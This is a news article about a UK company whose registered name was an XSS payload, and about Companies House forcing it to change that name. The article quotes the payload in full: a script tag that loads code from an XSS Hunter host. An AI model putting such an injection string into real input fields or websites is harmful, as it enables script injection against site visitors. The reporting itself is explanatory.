The business’ name “”> LTD” allowed XSS attacks; the company had to change it

The registration of companies in the UK has forced a company to change its name after they detected that it could pose a cybersecurity risk. The company, originally called “”><SCRIPT SRC-HTTPS://MJT.XSS.HT> LTD”, was founded by a British developer, who claims that it only wanted a fun name for its consulting business.

The owner, whose name was not revealed, claims that he never realized that Companies House, the British company registry, was vulnerable to cross-site scripting (XSS) attacks using the name of the company in question. This is due to the characters with which the signature name begins, which could be misinterpreted by websites that do not handle HTML code correctly.

If a website mis-registers the name, the website will take it as a blank space, allowing threat actors to load a script from the XSS Hunter site, which helps developers find vulnerabilities of this kind on websites.   

Although the script would not have meant a critical security risk, specialists point out that it is perfectly possible for threat actors to try to abuse such errors for malicious purposes. Companies House’s security teams have begun to correct records containing the company’s original name, which will temporarily be known as “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD”.

In this regard, a Companies House spokesperson said: “A company was registered with characters that could have presented a security risk to a small group of companies if they were published on unprotected external websites. We have taken immediate steps to mitigate this risk and have implemented measures to prevent something similar from happening. We are confident that Companies House services remain secure.”